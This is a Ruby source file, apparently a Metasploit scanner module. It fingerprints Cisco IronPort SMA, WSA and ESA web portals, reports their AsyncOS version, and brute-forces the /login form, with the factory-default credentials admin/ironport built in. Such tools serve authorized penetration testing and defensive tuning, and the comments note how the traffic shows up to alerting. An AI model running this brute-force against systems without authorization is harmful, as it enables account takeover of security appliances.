GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
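# Auxiliary scanner that fingerprints Cisco IronPort (SMA / WSA / ESA) web
# login portals, reports the AsyncOS version from the bundled help page, and
# then tries username/password pairs against the /login form.
#
# Traffic produced per host, in order: GET /, GET of the static help page,
# then one POST /login per credential pair. On the appliance side this shows
# up as a burst of login POSTs from a single source, which is what login
# rate limiting and failed-login alerting should be tuned to catch.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  # Transport-level failures that every request in this module treats as
  # "host not reachable" rather than as an unexpected error.
  CONNECTION_ERRORS = [
    ::Rex::ConnectionRefused,
    ::Rex::HostUnreachable,
    ::Rex::ConnectionTimeout,
    ::Rex::ConnectionError,
    ::Errno::EPIPE
  ].freeze

  # Static help page that carries the product banner and AsyncOS version.
  HELP_PAGE_URI = '/help/wwhelp/wwhimpl/common/html/default.htm'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Ironport Bruteforce Login Utility',
        'Description' => %q{
          This module scans for Cisco Ironport SMA, WSA and ESA web login portals, finds AsyncOS
          versions, and performs login brute force to identify valid credentials.
        },
        'Author' => [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
        ],
        'License' => MSF_LICENSE,
        'DefaultOptions' => { 'SSL' => true },
        # NOTE(review): these are placeholders. A login brute force writes
        # failed-login entries to the target's logs and may trip a lockout
        # policy; consider declaring that explicitly (e.g. IOC_IN_LOGS,
        # ACCOUNT_LOCKOUTS) once confirmed against the product.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        # admin / ironport is the widely documented factory default for these
        # appliances; a successful login with it means the initial password
        # was never changed.
        OptString.new('USERNAME', [true, "A specific username to authenticate as", "admin"]),
        OptString.new('PASSWORD', [true, "A specific password to authenticate with", "ironport"])
      ]
    )
  end

  # Per-host entry point called by the Scanner mixin.
  #
  # Stops early when the host does not answer or does not look like an
  # IronPort appliance, so no login attempts are sent to unrelated services.
  #
  # @param ip [String] target address supplied by the scanner (unused here;
  #   requests go through the HttpClient mixin's rhost/rport)
  # @return [void]
  def run_host(ip)
    unless check_conn?
      print_error("#{rhost}:#{rport} - Connection failed, Aborting...")
      return
    end

    unless is_app_ironport?
      print_error("#{rhost}:#{rport} - Application does not appear to be Cisco Ironport. Module will not continue.")
      return
    end

    print_status("#{rhost}:#{rport} - Starting login brute force...")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  # Sends a single GET / to see whether the web server answers at all.
  #
  # @return [Boolean] true when any response came back, false when there was
  #   no response or the connection failed
  def check_conn?
    res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' })
    return false unless res

    print_good("#{rhost}:#{rport} - Server is responsive...")
    true
  rescue *CONNECTION_ERRORS
    # Deliberately quiet: the caller prints the failure message.
    false
  end

  # Confirms the target is an IronPort appliance before any login attempt.
  #
  # Fetches / to obtain session cookies, replays them against the help page,
  # and looks for the "Cisco IronPort AsyncOS" banner. The version and product
  # strings are parsed defensively: a page that carries the banner but not the
  # expected layout no longer raises NoMethodError on a nil match.
  #
  # @return [Boolean] true when the help page returned 200 and contains the
  #   banner; false otherwise, including on connection failure
  def is_app_ironport?
    landing = send_request_cgi({ 'uri' => '/', 'method' => 'GET' })
    return false unless landing && landing.get_cookies

    help = send_request_cgi(
      {
        'uri' => HELP_PAGE_URI,
        'method' => 'GET',
        'cookie' => landing.get_cookies
      }
    )
    return false unless help && help.code == 200 && help.body.include?('Cisco IronPort AsyncOS')

    # The capture group includes a trailing space and sometimes a quote
    # character; both are dropped so the reported version is clean.
    version = help.body[/Cisco IronPort AsyncOS (.+? )/, 1]&.delete('"')&.strip || 'unknown'
    product = help.body[/for (.*)</, 1]

    case product
    when 'Security Management Appliances'
      print_good("#{rhost}:#{rport} - Running Cisco IronPort #{product} (SMA) - AsyncOS v#{version}")
    when 'Cisco IronPort Web Security Appliances'
      print_good("#{rhost}:#{rport} - Running #{product} (WSA) - AsyncOS v#{version}")
    when 'Cisco IronPort Appliances'
      print_good("#{rhost}:#{rport} - Running #{product} (ESA) - AsyncOS v#{version}")
    else
      # Banner present but product line not one of the three known strings;
      # still treated as IronPort, matching the previous behaviour.
      vprint_status("#{rhost}:#{rport} - Cisco IronPort banner found, product not recognised - AsyncOS v#{version}")
    end

    true
  rescue *CONNECTION_ERRORS
    vprint_error("#{rhost}:#{rport} - Connection failed while fingerprinting the application")
    false
  end

  # Labels the service recorded alongside any stored credential.
  #
  # @return [Hash] the mixin's service details with service_name overridden
  def service_details
    super.merge({ service_name: 'Cisco IronPort Appliance' })
  end

  # Tries one username/password pair against the /login form.
  #
  # Success is inferred from an "authenticated=" cookie in the response. A
  # valid pair is stored through store_valid_credential, with the response
  # cookies kept as proof.
  #
  # @param user [String] username to try
  # @param pass [String] password to try
  # @return [Symbol, nil] :next_user after a valid login, :abort when the
  #   connection fails, nil after a failed attempt
  def do_login(user, pass)
    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")

    res = send_request_cgi(
      {
        'uri' => '/login',
        'method' => 'POST',
        'vars_post' => {
          'action' => 'Login',
          'referrer' => '',
          'screen' => 'login',
          'username' => user,
          'password' => pass
        }
      }
    )

    unless res && res.get_cookies.include?('authenticated=')
      vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
      return
    end

    print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
    store_valid_credential(user: user, private: pass, proof: res.get_cookies.inspect)
    :next_user
  rescue *CONNECTION_ERRORS
    print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
    :abort
  end
end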